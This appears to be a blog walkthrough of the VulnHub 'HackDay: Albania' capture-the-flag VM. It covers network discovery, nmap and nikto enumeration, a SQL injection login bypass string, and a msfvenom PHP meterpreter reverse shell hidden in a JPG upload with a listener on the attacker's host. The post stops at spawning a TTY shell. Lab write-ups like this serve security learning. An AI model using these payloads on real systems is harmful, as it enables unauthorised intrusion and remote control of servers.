HackDay: Albania (CTF)
By Hud Seidu Daannaa
The VM is available at https://www.vulnhub.com/entry/hackday-albania,167/
==============================================
==============================================
1.
HOST DISCOVERY
___
Host discovery using Netdiscover or Nmap, but we chose, Netdiscover, we will scan the network, in order to identify the target machine
$ netdiscover -i eth1 -r 192.168.99.100/24
Currently scanning: 192.168.99.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
___________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.99.100 08:00:27:98:0d:5f 1 60 Cadmus Computer Systems
==============================================
==============================================
2a.
PORTSCAN
___
Using Nmap, within its default state to scan for open, closed or filtered port states
nmap 192.168.99.100
Starting Nmap 7.31 ( https://nmap.org ) at 2016-11-24 13:32 EST
Nmap scan report for 192.168.99.100
Host is up (0.00024s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
8008/tcp open http
MAC Address: 08:00:27:98:0D:5F (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.24 seconds
==============================================
==============================================
2b.
CHOSEN PORT TO ENUMERATE
___
There are two ports opened, ssh requires a login, most especially requires a brute-force, due to the time factor, we will focus on the web server and hence the web server resides on a non-standardized port 8008. Again we use Nmap scripting engine to enumerate this service
nmap -p 8008 --script http-enum 192.168.99.100
Starting Nmap 7.31 ( https://nmap.org ) at 2016-11-24 13:33 EST
Nmap scan report for 192.168.99.100
Host is up (0.00020s latency).
PORT STATE SERVICE
8008/tcp open http
| http-enum:
| /robots.txt: Robots file
|_ /js/: Potentially interesting folder
MAC Address: 08:00:27:98:0D:5F (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.91 seconds
==============================================
==============================================
2c.
FURTHER ENUMERATION
___
Using the scripting engine of Nmap and the service detection parameter -sV to enumerate for the robots.txt
nmap 192.168.99.100 -p8008 -sV --script http-robots.txt
Starting Nmap 7.31 ( https://nmap.org ) at 2016-11-24 13:34 EST
Nmap scan report for 192.168.99.100
Host is up (0.00020s latency).
PORT STATE SERVICE VERSION
8008/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 26 disallowed entries (15 shown)
| /rkfpuzrahngvat/ /slgqvasbiohwbu/ /tmhrwbtcjpixcv/
| /vojtydvelrkzex/ /wpkuzewfmslafy/ /xqlvafxgntmbgz/ /yrmwbgyhouncha/
| /zsnxchzipvodib/ /atoydiajqwpejc/ /bupzejbkrxqfkd/ /cvqafkclsyrgle/
|_/unisxcudkqjydw/ /dwrbgldmtzshmf/ /exschmenuating/ /fytdinfovbujoh/
|_http-server-header: Apache/2.4.18 (Ubuntu)
MAC Address: 08:00:27:98:0D:5F (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.54 seconds
==============================================
==============================================
3a.
ANALYSING THE CONTENT OF THE ROBOTS.TXT FILE
___
Opening the web address in the browser
http://192.168.99.100:8008
From the Nmap, with the help of its scripting engine, as highlighted in red, we perform further analysis on the robots.txt file. We play around with some bash scripting commands to analyze the paths from the Nmap scan
$ curl 192.168.99.100:8008/robots.txt | cut -d "/" -f2 > file1
$ touch file2
$ while read line; do wget 192.168.99.100:8008/$line; done < file1
$ while read line; do echo $line; cat $line; echo "--"; done < file1 >> file2
$ while read line; do rm $line; done < file1
$ rm file1
==============================================
==============================================
3b.
Accessing file2, we attained the following results:
unisxcudkqjydw
IS there any /vulnbank/ in there ???
==============================================
==============================================
4.
DIR TRANSVERSING
===
Using the traversing technique, we follow the directories accordingly
http://192.168.99.100:8008/unisxcudkqjydw/vulnbank/client
Bam !!!
there it is, a login.php
==============================================
==============================================
5.
NIKTO
===
It is always a good practice to run that Nikto since it contains more automated public information
and can help save time, there is also no harm in running this program.
$ Nikto -h http://192.168.99.100:8008/unisxcudkqjydw/vulnbank/client/
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP: 192.168.99.100
+ Target Hostname: 192.168.99.100
+ Target Port: 8008
+ Start Time: 2016-11-20 20:20:06 (GMT7)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ Cookie PHPSESSID created without the httponly flag
+ Retrieved x-powered-by header: PHP/7.0.8-0ubuntu0.16.04.3
+ The anti-clickjacking X-Frame-Options header is not present.
+ Root page / redirects to: login.php
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-630: IIS may reveal its internal or real IP in the Location header via a request to the /images directory. The value is "http://127.0.1.1/unisxcudkqjydw/vulnbank/client/images/".
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ /unisxcudkqjydw/vulnbank/client/config.php: PHP Config file may contain database IDs and passwords.
+ OSVDB-3268: /unisxcudkqjydw/vulnbank/client/images/: Directory indexing found.
+ OSVDB-3268: /unisxcudkqjydw/vulnbank/client/images/?pattern=/etc/*&sort=name: Directory indexing found.
+ /unisxcudkqjydw/vulnbank/client/login.php: Admin login page/section found.
+ 6544 items checked: 0 error(s) and 9 item(s) reported on remote host
+ End Time: 2016-11-20 20:20:15 (GMT7) (9 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
The highlights in red are potential opportunities and some useful information, we could exploit,
I will keep this behind my sleeve.
==============================================
==============================================
6.
SQL INJECTION
===
The presence of a username and a password, promises a database.
form the page source, or using a proxy tool like Buresuite or ZAP, we can tell the method or data
transmission is a POST, unlike normal GET methods, a POST based SQLi is different to exploit
we can capture POST request with a proxy tool or better still, try some manual commands to see if we will be in luck. After a handful of attempts we finally arrived at:
admin’%20# (where %20 denotes a URL encoding for space)
The above command gave us access to the login page.
==============================================
==============================================
7.
ENTRY POINTS
===
Since the login page is a .php it means it runs PHP code, after enumerating the web application, with the aim of trying to understand how the web app works, we realized it accepts jpeg, jpg etc.
To proceed we construct a payload. we start of by creating an empty jpg:
touch den.jpg
Generation of a reverse PHP meterpreter shell into a jpg:
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.99.90 LPORT=4444 -o file.php
cat file.php >> den.jpg
After creations from the MSF Console or SEToolkit, we invoke a multi/handler for the remote connection:
msfconsole msf > use exploit/multi/handler msf exploit(handler) > set payload php/meterpreter_reverse_tcp msf exploit(handler) > set LHOST 192.168.99.90
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > run
After firing up the multi-handler, it is not time to upload the jpg via the ticketing system. The actions result in a low shell privilege.
==============================================
==============================================
8.
ESCALATING PRIVILEGES
===
Using python3 to spawn a TTY shell:python3 -c ‘;import pty; pty.spawn("/bin/sh")’;
No comments:
Post a Comment